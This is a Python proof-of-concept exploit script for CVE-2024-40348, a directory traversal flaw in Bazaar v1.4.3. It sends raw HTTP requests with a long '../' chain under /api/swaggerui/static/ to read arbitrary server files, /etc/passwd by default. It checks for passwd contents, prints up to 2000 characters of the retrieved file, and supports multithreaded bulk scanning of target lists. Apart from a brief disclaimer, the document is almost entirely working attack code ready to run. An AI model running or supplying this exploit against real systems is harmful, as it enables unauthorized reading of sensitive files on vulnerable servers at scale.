"""POC for CVE-2024-40348.

Bazaar v1.4.3 allows unauthenticated attackers to execute a directory
traversal.

This tool is based on this security research:
https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md

Tool By: x.com/MohamedNab1l
GitHub: https://github.com/bigb0x/CVE-2024-40348

Usage:
    single scan: CVE-2024-40348.py -u hostname -p /etc/passwd
    bulk scan:   CVE-2024-40348.py -f file.txt -p /etc/passwd

Ref:
    https://nvd.nist.gov/vuln/detail/CVE-2024-40348
    https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md

Disclaimer:
    I like to create my own tools for fun, work and educational purposes
    only. I do not support or encourage hacking or unauthorized access to
    any system or network. Please use my tools responsibly and only on
    systems where you have clear permission to test.
"""

import argparse
import os
import queue
import re
import socket
import ssl
import threading
from datetime import datetime
from urllib.parse import urljoin, urlparse

import requests
import urllib3
from requests.exceptions import RequestException

# Disable SSL Warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ANSI color codes
light_gray_color = '\033[37;1m'
dimmed_gray_color = '\033[90m'
honey_yellow_color = "\033[38;5;214m"
dim_yellow_color = "\033[33;1m"
cyan_color = '\033[96m'
green_color = '\033[92m'
red_color = '\033[31m'
light_orange_color = '\033[38;5;214m'
reset_color = '\033[0m'

# Start time of the run. Kept as a module-level name for compatibility;
# console messages now use a fresh timestamp per message instead.
the_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')

# Log directory and file
LOG_DIR = 'logs'
LOG_FILE = os.path.join(LOG_DIR, 'scan.log')

# Seconds to wait on connect/read before giving up on a target.
DEFAULT_TIMEOUT = 10

# Upper bound on concurrent worker threads for bulk scans.
MAX_WORKERS = 10

# Re-entrant so a caller can hold it across several print_message() calls
# and keep one multi-line report contiguous when workers run concurrently.
_OUTPUT_LOCK = threading.RLock()

# level -> (timestamp colour, tag colour, tag text, colour the message too?)
_LEVEL_STYLES = {
    'vulnerable': (dimmed_gray_color, honey_yellow_color, 'VULN', False),
    'info': (dimmed_gray_color, dimmed_gray_color, 'INFO', False),
    'warning': (dimmed_gray_color, green_color, 'OK', False),
    'error': (light_gray_color, red_color, 'ERROR', True),
}

# Content checks applied to the response body.
_PASSWD_PATTERNS = tuple(re.compile(p) for p in (
    r'\w+:x:\d+:\d+:',
    r'root:',
    r'nobody:',
    r'/bin/bash',
    r'/usr/sbin/nologin',
))
_ANY_CONTENT_PATTERNS = (re.compile(r'\w+'),)


def _timestamp():
    """Return the current local time formatted for console and log lines."""
    return datetime.now().strftime('%Y-%m-%d %H:%M:%S')


def banner():
    """Print the tool banner to stdout."""
    # Backslashes are doubled so the art no longer relies on invalid escape
    # sequences; the printed characters are unchanged.
    # NOTE(review): the ASCII-art spacing was already collapsed in the copy
    # under review -- restore the original layout from upstream if needed.
    print(f"""{light_orange_color}
 _______ ________ ___ ____ ___ __ __ __ __ ____ _____ __ __ ____
/ ____/ | / / ____/ |__ \\ / __ \\__ \\/ // / / // / / __ \\__ // // / ( __ )
/ / | | / / __/________/ // / / /_/ / // /_______/ // /_/ / / //_
POC for CVE-2024-40348 Bazaar v1.4.3 and prior. Will attempt to read /etc/passwd from target.
{dimmed_gray_color}-> x.com/MohamedNab1l.
{reset_color}
""")


def create_log_dir():
    """Create LOG_DIR if it does not exist and report when it was created."""
    if not os.path.exists(LOG_DIR):
        # exist_ok guards against another process creating it in between.
        os.makedirs(LOG_DIR, exist_ok=True)
        print_message('info', f"Log directory created: {LOG_DIR}")


def log_message(message):
    """Append *message*, prefixed with a timestamp, to LOG_FILE."""
    # Make sure the directory exists so logging works even when
    # create_log_dir() has not been called yet.
    os.makedirs(LOG_DIR, exist_ok=True)
    with open(LOG_FILE, 'a', encoding='utf-8') as log_file:
        log_file.write(f"{_timestamp()} - {message}\n")


def print_message(level, message):
    """Print *message* with a coloured level tag and append it to the log.

    Args:
        level: One of 'vulnerable', 'info', 'warning' or 'error'. Any other
            value prints nothing, but the message is still logged.
        message: Text to show and log.
    """
    style = _LEVEL_STYLES.get(level)
    with _OUTPUT_LOCK:
        if style is not None:
            time_color, tag_color, tag, color_message = style
            prefix = f"[{time_color}{_timestamp()}]{tag_color} [{tag}] "
            if color_message:
                print(f"{prefix}{message}{reset_color}")
            else:
                print(f"{prefix}{reset_color}{message}")
        log_message(message)


def make_request(url, timeout=DEFAULT_TIMEOUT):
    """GET *url* without certificate verification.

    Args:
        url: Absolute URL to fetch.
        timeout: Seconds to wait for the server before giving up.

    Returns:
        The response text when the status code is 200, otherwise None
        (including on any requests-level error).
    """
    try:
        response = requests.get(url, verify=False, timeout=timeout)
    except RequestException:
        return None
    if response.status_code == 200:
        return response.text
    return None


def send_raw_request(host, port, path, timeout=DEFAULT_TIMEOUT):
    """Send a hand-built HTTP/1.1 GET and return the raw response text.

    A raw socket is used so that *path* goes on the wire exactly as given.

    Args:
        host: Target hostname or IP address.
        port: Target TCP port; TLS is used when this is 443.
        path: Request target placed verbatim on the request line.
        timeout: Seconds to wait on connect and on each read.

    Returns:
        Status line, headers and body decoded as UTF-8 with undecodable
        bytes dropped.

    Raises:
        OSError: On connection, TLS or timeout failures.
    """
    # NOTE(review): the request advertises gzip/deflate/br but the response
    # is decoded as plain text below, so a compressed body will not match
    # the content patterns in test_host().
    request = "".join((
        f"GET {path} HTTP/1.1\r\n",
        f"Host: {host}:{port}\r\n",
        "Cache-Control: max-age=0\r\n",
        "Accept-Language: en-US\r\n",
        "Upgrade-Insecure-Requests: 1\r\n",
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36\r\n",
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\n",
        "Accept-Encoding: gzip, deflate, br\r\n",
        "Connection: close\r\n\r\n",
    ))

    sock = socket.create_connection((host, port), timeout=timeout)
    try:
        if port == 443:
            context = ssl.create_default_context()
            sock = context.wrap_socket(sock, server_hostname=host)
        sock.sendall(request.encode())
        chunks = []
        # "Connection: close" means the server ends the response by closing
        # the socket, so read until recv() returns an empty chunk.
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    finally:
        sock.close()
    return b"".join(chunks).decode('utf-8', errors='ignore')


def _parse_status_code(headers):
    """Return the numeric status from a raw header block, or None."""
    status_line = headers.split('\r\n', 1)[0]
    parts = status_line.split()
    if len(parts) >= 2 and parts[1].isdigit():
        return int(parts[1])
    return None


def test_host(url, file_path):
    """Probe one target and report whether *file_path* could be read.

    Args:
        url: Target URL. A bare "host[:port]" is treated as http://.
        file_path: Path of the file to request from the target.
    """
    try:
        # The usage text allows a bare hostname; urlparse() only fills in
        # .hostname when a scheme separator is present.
        target = url if '://' in url else f"http://{url}"
        parsed_url = urlparse(target)
        host = parsed_url.hostname
        if not host:
            raise ValueError("no hostname in URL")
        port = parsed_url.port or (443 if parsed_url.scheme == 'https' else 80)
        path = f"/api/swaggerui/static/../../../../../../../../../../../../../../../../{file_path}"

        print_message('info', f"Sending request to: {host}:{port}")
        response = send_raw_request(host, port, path)
        headers, _, body = response.partition('\r\n\r\n')

        if file_path == '/etc/passwd':
            patterns = _PASSWD_PATTERNS
        else:
            patterns = _ANY_CONTENT_PATTERNS

        # Require a 200 as make_request() does: an error page has a
        # non-empty body too and would otherwise match the generic pattern.
        is_ok = _parse_status_code(headers) == 200
        if is_ok and any(pattern.search(body) for pattern in patterns):
            # Hold the lock so the three-part report stays contiguous.
            with _OUTPUT_LOCK:
                print_message('vulnerable', f"Vulnerable {url}")
                print_message('vulnerable', f"Reading {file_path}")
                print(f"{body[:2000]}...\n")
        else:
            print_message('warning', f"Not Vulnerable {url}")
    except Exception as exc:
        # Per-target boundary: report the failure (with its cause) and let
        # the scan continue with the next target.
        print_message('error', f"{url} - {exc}")


def worker(queue, file_path):
    """Drain *queue*, testing each URL it yields against *file_path*.

    Args:
        queue: A queue.Queue of target URLs.
        file_path: Path of the file to request from each target.
    """
    # The parameter name shadows the queue module inside this function, so
    # pull the exception type in directly.
    from queue import Empty

    while True:
        # get_nowait() avoids the empty()-then-get() race, where a worker
        # could block forever after another thread took the last item.
        try:
            url = queue.get_nowait()
        except Empty:
            return
        try:
            print_message('info', f"Testing {url}")
            test_host(url, file_path)
        finally:
            queue.task_done()


def main():
    """Parse command-line arguments and run a single or bulk scan."""
    banner()
    parser = argparse.ArgumentParser(description='POC for CVE-2024-40348 Bazaar v1.4.3 and prior. Will attempt to read /etc/passwd from target server')
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('-u', '--url', help='Target URL (e.g., http://example.com)')
    group.add_argument('-f', '--file', help='File containing list of URLs (one per line)')
    parser.add_argument('-p', '--path', default='/etc/passwd', help='File path to check (default: /etc/passwd)')
    args = parser.parse_args()

    create_log_dir()
    # An explicit empty "-p ''" falls back to the default path.
    file_path = args.path or "/etc/passwd"

    if args.url:
        print_message('info', f"Testing single target: {args.url}")
        test_host(args.url, file_path)
    elif args.file:
        try:
            with open(args.file, 'r', encoding='utf-8') as handle:
                urls = [line.strip() for line in handle if line.strip()]
        except OSError as exc:
            print_message('error', f"Cannot read {args.file}: {exc}")
            return

        print_message('info', f"Testing multiple targets from file: {args.file}")

        url_queue = queue.Queue()
        for url in urls:
            url_queue.put(url)

        # No point starting more threads than there are targets.
        threads = []
        for _ in range(min(MAX_WORKERS, len(urls))):
            t = threading.Thread(target=worker, args=(url_queue, file_path))
            t.start()
            threads.append(t)
        for t in threads:
            t.join()

    print_message('info', "Scanning complete.")


if __name__ == '__main__':
    main()